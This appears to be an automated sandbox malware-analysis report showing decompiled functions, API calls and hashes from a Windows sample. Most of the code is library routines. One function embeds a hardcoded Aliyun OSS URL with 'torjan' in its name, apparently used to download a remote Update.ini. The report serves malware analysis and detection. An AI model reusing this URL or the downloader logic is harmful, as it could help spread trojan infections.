Part of subcall function 00CD96DD: GetSysColor.USER32(0000000A), ref: 00CD983D

Part of subcall function 00CD91A9: __EH_prolog3_GS.LIBCMT ref: 00CD91B3
Part of subcall function 00CD91A9: GetDeviceCaps.GDI32(?,00000058), ref: 00CD91D3
Part of subcall function 00CD91A9: DeleteObject.GDI32(00000000), ref: 00CD923D
Part of subcall function 00CD91A9: DeleteObject.GDI32(00000000), ref: 00CD925B
Part of subcall function 00CD91A9: DeleteObject.GDI32(00000000), ref: 00CD9279
Part of subcall function 00CD91A9: DeleteObject.GDI32(00000000), ref: 00CD9297
Part of subcall function 00CD91A9: DeleteObject.GDI32(00000000), ref: 00CD92B5
Part of subcall function 00CD91A9: DeleteObject.GDI32(00000000), ref: 00CD92D3
Part of subcall function 00CD91A9: DeleteObject.GDI32(00000000), ref: 00CD92F1

Part of subcall function 00CD8FC9: GetSystemMetrics.USER32 ref: 00CD8FD7
Part of subcall function 00CD8FC9: GetSystemMetrics.USER32 ref: 00CD8FE5
Part of subcall function 00CD8FC9: SetRectEmpty.USER32(?), ref: 00CD8FF8
Part of subcall function 00CD8FC9: EnumDisplayMonitors.USER32(00000000,00000000,00CD8E5F,?,?,00000000,00CD8F8A), ref: 00CD9008
Part of subcall function 00CD8FC9: SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00CD9017
Part of subcall function 00CD8FC9: SystemParametersInfoA.USER32(00001002,00000000,?,00000000), ref: 00CD9044
Part of subcall function 00CD8FC9: SystemParametersInfoA.USER32(00001012,00000000,?,00000000), ref: 00CD9058
Part of subcall function 00CD8FC9: SystemParametersInfoA.USER32 ref: 00CD907E

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Color$DeleteObjectSystem$Info$Parameters$Metrics$CapsConditionDeviceMask$DisplayEmptyEnumH_prolog3H_prolog3_MonitorsRectVerifyVersion
String ID:
API String ID: 551326122-0
Opcode ID: 8a4395e937817b6548fbfcdfb91542a55f56b72aaf89c71fc1d957c73d5f2847
Instruction ID: 3ab2798d354d30ec5a8d14e865f9fb98a496005f2e9094f8fd20e1629bb6d186
Opcode Fuzzy Hash: 8a4395e937817b6548fbfcdfb91542a55f56b72aaf89c71fc1d957c73d5f2847
Instruction Fuzzy Hash: 911177B1A00318AFD720AF759C56FAF77BCEB84744F00445FB24696281CF744A45CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00CADB0E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 44
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 67%

			E00CADB0E(void* __ebx, signed int __ecx, void* __edi, void* __esi, void* __eflags, intOrPtr _a8) {
				signed int _v0;
				signed int _v4;
				signed int _v16;
				signed int _t19;
				void* _t20;
				intOrPtr _t21;
				intOrPtr _t25;
				signed int _t27;
				void* _t28;
				struct _CRITICAL_SECTION* _t29;
				signed int _t31;
				signed int _t32;
				signed int _t35;
				intOrPtr* _t37;
				long* _t38;
				void* _t40;
				signed int _t41;

				_t40 = __esi;
				_t31 = __ecx;
				_t28 = __ebx;
				_push(4);
				E00DDD52C(0xe0853c, __ebx, __edi, __esi);
				_t37 = __ecx;
				if(_a8 == 0) {
					L8:
					E00CAA4E7(_t28, _t31, _t37, _t40, __eflags);
					asm("int3");
					_push(_t28);
					_push(_t40);
					_push(_t37);
					_t38 = _t31;
					_t29 =  &(_t38[7]);
					EnterCriticalSection(_t29);
					_t41 = _v0;
					__eflags = _t41;
					if(_t41 <= 0) {
						L15:
						LeaveCriticalSection(_t29);
						_t19 = 0;
						__eflags = 0;
					} else {
						__eflags = _t41 - _t38[3];
						if(_t41 >= _t38[3]) {
							goto L15;
						} else {
							_t20 = TlsGetValue( *_t38);
							__eflags = _t20;
							if(_t20 == 0) {
								goto L15;
							} else {
								_t32 =  *(_t20 + 0xc);
								__eflags = _t32;
								if(_t32 == 0) {
									goto L15;
								} else {
									__eflags = _t41 -  *((intOrPtr*)(_t20 + 8));
									if(_t41 >=  *((intOrPtr*)(_t20 + 8))) {
										goto L15;
									} else {
										LeaveCriticalSection(_t29);
										_t19 =  *((intOrPtr*)(_t32 + _t41 * 4));
									}
								}
							}
						}
					}
					return _t19;
				} else {
					_t21 =  *__ecx;
					if(_t21 != 0) {
						L5:
						_push(_t21);
						L9();
						_t44 = _t21;
						_t55 = _t44;
						if(_t44 == 0) {
							 *0xe17a64();
							_t25 = _a8();
							_t35 =  *0xe85298; // 0xe85264
							_t44 = _t25;
							_push(_t25);
							_push( *_t37);
							E00CADC41(_t28, _t35, _t37, _t44, _t55);
						}
						return E00DDD4FA(_t44);
					} else {
						_t27 =  *0xe85298; // 0xe85264
						if(_t27 != 0) {
							L4:
							_t31 = _t27; // executed
							_t21 = E00CAD917(_t31); // executed
							 *_t37 = _t21;
							if(_t21 == 0) {
								goto L8;
							} else {
								goto L5;
							}
						} else {
							_t31 = 0xe85264;
							_v16 = 0xe85264;
							_v4 = _v4 & _t27;
							_t27 = E00CAD80A(0xe85264, __ecx);
							_v4 = _v4 | 0xffffffff;
							 *0xe85298 = _t27;
							if(_t27 == 0) {
								goto L8;
							} else {
								goto L4;
							}
						}
					}
				}
			}

0x00cadb0e
0x00cadb0e
0x00cadb0e
0x00cadb0e
0x00cadb15
0x00cadb1a
0x00cadb20
0x00cadb93
0x00cadb93
0x00cadb98
0x00cadb9c
0x00cadb9d
0x00cadb9e
0x00cadb9f
0x00cadba1
0x00cadba5
0x00cadbab
0x00cadbae
0x00cadbb0
0x00cadbdd
0x00cadbde
0x00cadbe4
0x00cadbe4
0x00cadbb2
0x00cadbb2
0x00cadbb5
0x00000000
0x00cadbb7
0x00cadbb9
0x00cadbbf
0x00cadbc1
0x00000000
0x00cadbc3
0x00cadbc3
0x00cadbc6
0x00cadbc8
0x00000000
0x00cadbca
0x00cadbca
0x00cadbcd
0x00000000
0x00cadbcf
0x00cadbd3
0x00cadbd9
0x00cadbd9
0x00cadbcd
0x00cadbc8
0x00cadbc1
0x00cadbb5
0x00cadbea
0x00cadb22
0x00cadb22
0x00cadb26
0x00cadb5b
0x00cadb61
0x00cadb62
0x00cadb67
0x00cadb69
0x00cadb6b
0x00cadb70
0x00cadb76
0x00cadb79
0x00cadb7f
0x00cadb81
0x00cadb82
0x00cadb84
0x00cadb84
0x00cadb90
0x00cadb28
0x00cadb28
0x00cadb2f
0x00cadb4e
0x00cadb4e
0x00cadb50
0x00cadb55
0x00cadb59
0x00000000
0x00000000
0x00000000
0x00000000
0x00cadb31
0x00cadb31
0x00cadb36
0x00cadb39
0x00cadb3c
0x00cadb41
0x00cadb45
0x00cadb4c
0x00000000
0x00000000
0x00000000
0x00000000
0x00cadb4c
0x00cadb2f
0x00cadb26

APIs

__EH_prolog3.LIBCMT ref: 00CADB15

Part of subcall function 00CAD80A: TlsAlloc.KERNEL32(?,00CADB41,00000004,00CACEFD,00CAA535,00CAACCA,00CA2A9E,00CA60A7,?,?,00CA2B44,01FC45C7,?,00CA2AE8,?,00000000), ref: 00CAD829
Part of subcall function 00CAD80A: InitializeCriticalSection.KERNEL32(00E85280,?,00CADB41,00000004,00CACEFD,00CAA535,00CAACCA,00CA2A9E,00CA60A7,?,?,00CA2B44,01FC45C7,?,00CA2AE8,?), ref: 00CAD83A

Strings

dR, xrefs: 00CADB31
dR, xrefs: 00CADB28, 00CADB45, 00CADB5B, 00CADB79

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: AllocCriticalH_prolog3InitializeSection
String ID: dR$dR
API String ID: 2369468792-2015894829
Opcode ID: f35711c76d3f437eb6d87334b124db3556743bfdb3e388dc641751ff8e1ef456
Instruction ID: 4ffb56b65307ffd5eb9f19c155b3d750700c19dece4cb88c407e48dbfcca4acb
Opcode Fuzzy Hash: f35711c76d3f437eb6d87334b124db3556743bfdb3e388dc641751ff8e1ef456
Instruction Fuzzy Hash: B3017171A00607CFDF24AFB5E84AA6D3771AF41358B154525A85B9B7A0DF30CE40DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00CABE73 Relevance: 4.7, APIs: 3, Instructions: 160
fileCOMMON

Download Yara Rule

C-Code - Quality: 39%

			E00CABE73(intOrPtr __ecx, void* __eflags, intOrPtr _a4, signed int _a8, intOrPtr _a12) {
				signed int _v8;
				char _v268;
				signed int _v272;
				intOrPtr _v276;
				intOrPtr _v280;
				signed int _v284;
				signed int _v288;
				char _v292;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t44;
				intOrPtr _t49;
				void* _t50;
				void* _t54;
				void* _t56;
				signed int _t63;
				signed int _t65;
				signed int _t73;
				void* _t75;
				void* _t78;
				signed int _t81;
				void* _t82;
				signed int _t91;
				signed int _t97;
				signed int _t101;
				void* _t102;
				void* _t103;
				intOrPtr _t104;
				intOrPtr _t106;
				void* _t107;
				signed int _t108;

				_t44 =  *0xe68dd4; // 0x8d2643c2
				_v8 = _t44 ^ _t108;
				 *(__ecx + 4) =  *(__ecx + 4) | 0xffffffff;
				_t106 = _a4;
				_t81 = 0;
				_v276 = _a12;
				_t101 = _a8 & 0xffff7fff;
				_v280 = __ecx;
				 *((intOrPtr*)(__ecx + 8)) = 0;
				_v272 = __ecx + 0xc;
				E00CA2C0A(0, __ecx + 0xc);
				if(_t106 == 0) {
					L32:
					_t49 = _v276;
					__eflags = _t49;
					if(_t49 != 0) {
						 *((intOrPtr*)(_t49 + 8)) = 3;
						_t103 = _t49 + 0x10;
						__eflags = _t106;
						if(_t106 != 0) {
							_t81 = E00DEC1A0(_t106);
						}
						_push(_t81);
						E00CA2CD7(_t81, _t103, _t103, _t106, _t106);
					}
					L36:
					_t50 = 0;
					L37:
					_pop(_t102);
					_pop(_t107);
					_pop(_t82);
					return E00DDCBCE(_t50, _t82, _v8 ^ _t108, _t97, _t102, _t107);
				}
				_t54 = E00CAC14B(_t106, 0x104, 0);
				_t111 = _t54;
				if(_t54 < 0) {
					goto L32;
				}
				_t56 = E00CAC295(0, _t101, _t106, _t111,  &_v268, _t106, _v276); // executed
				if(_t56 == 0) {
					goto L36;
				}
				_push(E00DEC1A0( &_v268));
				E00CA2CD7(0, _v272, _t101, _t106,  &_v268);
				_v272 = 0;
				_t91 = 3;
				_t63 = _t101 & _t91;
				if(_t63 == 0) {
					_v272 = 0x80000000;
				} else {
					_t78 = _t63 - 1;
					if(_t78 == 0) {
						_v272 = 0x40000000;
					} else {
						if(_t78 == 1) {
							_v272 = 0xc0000000;
						}
					}
				}
				_t65 = _t101 & 0x00000070;
				if(_t65 == 0 || _t65 == 0x10) {
					L17:
					_t97 = _t81;
				} else {
					if(_t65 == 0x20) {
						_t97 = 1;
						L18:
						_v292 = 0xc;
						_v288 = _t81;
						_v284 =  !(_t101 >> 7) & 0x00000001;
						if((_t101 & 0x00001000) != 0) {
							asm("sbb ecx, ecx");
							_t91 = ( ~(_t101 & 0x00002000) & 0x00000002) + 2;
						}
						_t73 = (_t101 & 0x00010000) << 0x0000000d | 0x00000080;
						if((_t101 & 0x00020000) != 0) {
							_t73 = _t73 | 0x80000000;
						}
						if((_t101 & 0x00040000) != 0) {
							_t73 = _t73 | 0x10000000;
						}
						if((_t101 & 0x00080000) != 0) {
							_t73 = _t73 | 0x08000000;
						}
						_t104 = _v280;
						_push(_t81);
						_push(_t73);
						_push(_t91);
						_push( &_v292);
						_push(_t97);
						_push(_v272);
						_push(_t106);
						if( *((intOrPtr*)(_t104 + 0x10)) == _t81) {
							_t75 = CreateFileA(); // executed
						} else {
							_t75 = E00CABC3C( *((intOrPtr*)(_t104 + 0x10)));
						}
						if(_t75 != 0xffffffff) {
							 *(_t104 + 4) = _t75;
							_t50 = 1;
							 *((intOrPtr*)(_t104 + 8)) = 1;
							goto L37;
						} else {
							E00CAC253(_t81, _v276, _t106);
							goto L36;
						}
					}
					if(_t65 == 0x30) {
						_t97 = 2;
						goto L18;
					}
					if(_t65 != 0x40) {
						goto L17;
					}
					_t97 = _t91;
				}
			}

0x00cabe7c
0x00cabe83
0x00cabe89
0x00cabe8f
0x00cabe92
0x00cabe98
0x00cabe9e
0x00cabea7
0x00cabead
0x00cabeb2
0x00cabeb8
0x00cabebf
0x00cac037
0x00cac037
0x00cac03d
0x00cac03f
0x00cac041
0x00cac048
0x00cac04b
0x00cac04d
0x00cac056
0x00cac056
0x00cac058
0x00cac05c
0x00cac05c
0x00cac061
0x00cac061
0x00cac063
0x00cac066
0x00cac067
0x00cac06a
0x00cac071
0x00cac071
0x00cabecc
0x00cabed1
0x00cabed3
0x00000000
0x00000000
0x00cabee7
0x00cabeee
0x00000000
0x00000000
0x00cabf07
0x00cabf0f
0x00cabf18
0x00cabf1e
0x00cabf21
0x00cabf23
0x00cabf47
0x00cabf25
0x00cabf25
0x00cabf28
0x00cabf3b
0x00cabf2a
0x00cabf2d
0x00cabf2f
0x00cabf2f
0x00cabf2d
0x00cabf28
0x00cabf53
0x00cabf56
0x00cabf7a
0x00cabf7a
0x00cabf5d
0x00cabf60
0x00cabf77
0x00cabf7c
0x00cabf7e
0x00cabf8d
0x00cabf96
0x00cabfa2
0x00cabfae
0x00cabfb3
0x00cabfb3
0x00cabfc0
0x00cabfcb
0x00cabfcd
0x00cabfcd
0x00cabfd8
0x00cabfda
0x00cabfda
0x00cabfe5
0x00cabfe7
0x00cabfe7
0x00cabfec
0x00cabff2
0x00cabff3
0x00cabff4
0x00cabffb
0x00cabffc
0x00cabffd
0x00cac003
0x00cac007
0x00cac013
0x00cac009
0x00cac00c
0x00cac00c
0x00cac01c
0x00cac02c
0x00cac031
0x00cac032
0x00000000
0x00cac01e
0x00cac025
0x00000000
0x00cac025
0x00cac01c
0x00cabf65
0x00cabf72
0x00000000
0x00cabf72
0x00cabf6a
0x00000000
0x00000000
0x00cabf6c
0x00cabf6c

APIs

_strlen.LIBCMT ref: 00CAC050

Part of subcall function 00CAC295: __EH_prolog3_GS.LIBCMT ref: 00CAC29F
Part of subcall function 00CAC295: GetFullPathNameA.KERNEL32(?,00000104,?,?,00000158,00CABEEC,?,?,?,?,00000104,00000000,?,?,00000000), ref: 00CAC2D2
Part of subcall function 00CAC295: __cftof.LIBCMT ref: 00CAC2E6

_strlen.LIBCMT ref: 00CABEFB
CreateFileA.KERNEL32(?,80000000,00000000,0000000C,00000003,?,00000000,?,00000000,?,?,?,?,00000104,00000000,?), ref: 00CAC013

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: _strlen$CreateFileFullH_prolog3_NamePath__cftof
String ID:
API String ID: 2078296791-0
Opcode ID: 820ecda68739fe4005590283df50e53d5ff69a3e6f1053f6602bb204c9c9a8f4
Instruction ID: 78b7a3658fc8ed2410bb6389b920ef6921711dfe3c8bd43a33dde880e616e179
Opcode Fuzzy Hash: 820ecda68739fe4005590283df50e53d5ff69a3e6f1053f6602bb204c9c9a8f4
Instruction Fuzzy Hash: A651D875A0011A9FDB24CF69CC817EAB7A9EB46318F1842A9E565D7282C774CEC18F90

Uniqueness

Uniqueness Score: -1.00%

Function 00CA5559 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 17
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E00CA5559(signed int __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t11;
				void* _t24;
				void* _t25;

				_t25 = __eflags;
				_push(4);
				E00DDD52C(0xe07d83, __ebx, __edi, __esi);
				_push("https://wtyjqpaszl-torjan.oss-cn-beijing.aliyuncs.com/TorJanFile/UpdateInit/Update.ini");
				E00CA2ABC(__ebx, _t24 - 0x10, __edi, __esi, _t25);
				 *(_t24 - 4) =  *(_t24 - 4) & 0x00000000;
				_t11 = E00CA52E9(__ebx, _t24 - 0x10, __edx, __edi, __esi, _t25); // executed
				E00CA2975(_t11,  *((intOrPtr*)(_t24 - 0x10)) + 0xfffffff0);
				return E00DDD4FA(__ebx & 0xffffff00 | _t11 != 0x00000000);
			}

0x00ca5559
0x00ca5559
0x00ca5560
0x00ca5565
0x00ca556d
0x00ca5572
0x00ca5579
0x00ca5589
0x00ca5595

APIs

__EH_prolog3.LIBCMT ref: 00CA5560

Part of subcall function 00CA2ABC: __EH_prolog3.LIBCMT ref: 00CA2AC3

Part of subcall function 00CA52E9: __EH_prolog3_GS.LIBCMT ref: 00CA52F3

Strings

https://wtyjqpaszl-torjan.oss-cn-beijing.aliyuncs.com/TorJanFile/UpdateInit/Update.ini, xrefs: 00CA5565

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: H_prolog3$H_prolog3_
String ID: https://wtyjqpaszl-torjan.oss-cn-beijing.aliyuncs.com/TorJanFile/UpdateInit/Update.ini
API String ID: 4240126716-1473366117
Opcode ID: bdb459e5bba01fede634179b48d5c978b0d877b687423d03dbb82dafcb686237
Instruction ID: 85c51b4ac3fcc951e0a9025082a77f40ead8cecab2c2fc39ac30b4597835e483
Opcode Fuzzy Hash: bdb459e5bba01fede634179b48d5c978b0d877b687423d03dbb82dafcb686237
Instruction Fuzzy Hash: 77D01760A601269ADB04FAF4DC13BBE7226AF52714F804219B561662E2CF34A908EA21

Uniqueness

Uniqueness Score: -1.00%

Function 00CA90FF Relevance: 3.0, APIs: 2, Instructions: 27networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000101,?), ref: 00CA912F
WSACleanup.WS2_32 ref: 00CA9140

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: CleanupStartup
String ID:
API String ID: 915672949-0
Opcode ID: 6dfa464f0ed74885610e536280d4b626428c0eac397c3f250a5c312a2f8b36fe
Instruction ID: 0fdb1bf0de2df4e38b3fcdc68658e900a543cf63ef7b4374e888bad25ccb7cfa
Opcode Fuzzy Hash: 6dfa464f0ed74885610e536280d4b626428c0eac397c3f250a5c312a2f8b36fe
Instruction Fuzzy Hash: 1CF0E5719152058FC760AF35EC876EBB7B8EB8A354F40452AEC9DD3290EA709948C7D2

Uniqueness

Uniqueness Score: -1.00%

Function 00CD8251 Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00CD8258

Part of subcall function 00CD8EE2: VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,00000001,00000003), ref: 00CD8F3F
Part of subcall function 00CD8EE2: VerSetConditionMask.KERNEL32(00000000), ref: 00CD8F47
Part of subcall function 00CD8EE2: VerifyVersionInfoA.KERNEL32(0000009C,00000003,00000000), ref: 00CD8F58
Part of subcall function 00CD8EE2: GetSystemMetrics.USER32 ref: 00CD8F69

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: ConditionMask$H_prolog3InfoMetricsSystemVerifyVersion
String ID:
API String ID: 2710481357-0
Opcode ID: 8367e8cd6779d74855db127d7126c2bf5a7454c65a6017b0b4dc583decdc4639
Instruction ID: b8db07231c20ad8991c2db6295c2be8633f136a7b31d097df609e44b5336daf1
Opcode Fuzzy Hash: 8367e8cd6779d74855db127d7126c2bf5a7454c65a6017b0b4dc583decdc4639
Instruction Fuzzy Hash: 0C51CDB0946F458FD3A9CF3A85417C6FAE0BF89300F108A2E91AED6261EB716184DF55

Uniqueness

Uniqueness Score: -1.00%

Function 00DED4A9 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00DF5650: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00DF4CDF,00000001,00000364,00000006,000000FF,?,00CA6092,?,00000104,\Update.ini,?,00000000), ref: 00DF5691

_free.LIBCMT ref: 00DED518

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: cc86b6453756a3f7e40480501dc8e623eab792623a5bf4f5e80fe105d29d33f7
Instruction ID: c4934405720ca1baf533d8f8aa57b6ea7cd82ded390065c2ba7982c8e35af223
Opcode Fuzzy Hash: cc86b6453756a3f7e40480501dc8e623eab792623a5bf4f5e80fe105d29d33f7
Instruction Fuzzy Hash: 34018E726003566BC3209F69D48199AFB98EB053B0F05421DE655A71C0D770AC00C7B4

Uniqueness

Uniqueness Score: -1.00%

Function 00DF5650 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00DF4CDF,00000001,00000364,00000006,000000FF,?,00CA6092,?,00000104,\Update.ini,?,00000000), ref: 00DF5691

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 420a2f3f21741ab378bf3eec7b85d0185f02c20df85887b9c9f2d75493c27be5
Instruction ID: 8c733362c14039a119391ffd66e3449a14679e696884835ef33921115945f87f
Opcode Fuzzy Hash: 420a2f3f21741ab378bf3eec7b85d0185f02c20df85887b9c9f2d75493c27be5
Instruction Fuzzy Hash: B8F0B431601E2C6ADB212E26FC05A7A3758EF41764B5FC122EB28EA198DA20D80146F4

Uniqueness

Uniqueness Score: -1.00%

Function 00CACB3F Relevance: 1.5, APIs: 1, Instructions: 37COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 00CACB46

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: H_prolog3_catch
String ID:
API String ID: 3886170330-0
Opcode ID: bf7ec71304242fe5f7b331116e14d0a556f30377b9c7990745b0a09e642e4915
Instruction ID: 0803c1b74b97eef57718eb1e0270a6649d0b6ff302acebf0aae87a821ea0a162
Opcode Fuzzy Hash: bf7ec71304242fe5f7b331116e14d0a556f30377b9c7990745b0a09e642e4915
Instruction Fuzzy Hash: BD11E2B0801B408BD3318F2A8241256FBF4BFA9708B100A0FD1D697AA1C7B5A148DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00DF598E Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,8007000E,?,?,00CA95AE,8007000E,00000000,?,?,00CA9725,8007000E,?,00CA9A96,0000000C,00000004,00CA20EA), ref: 00DF59C0

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
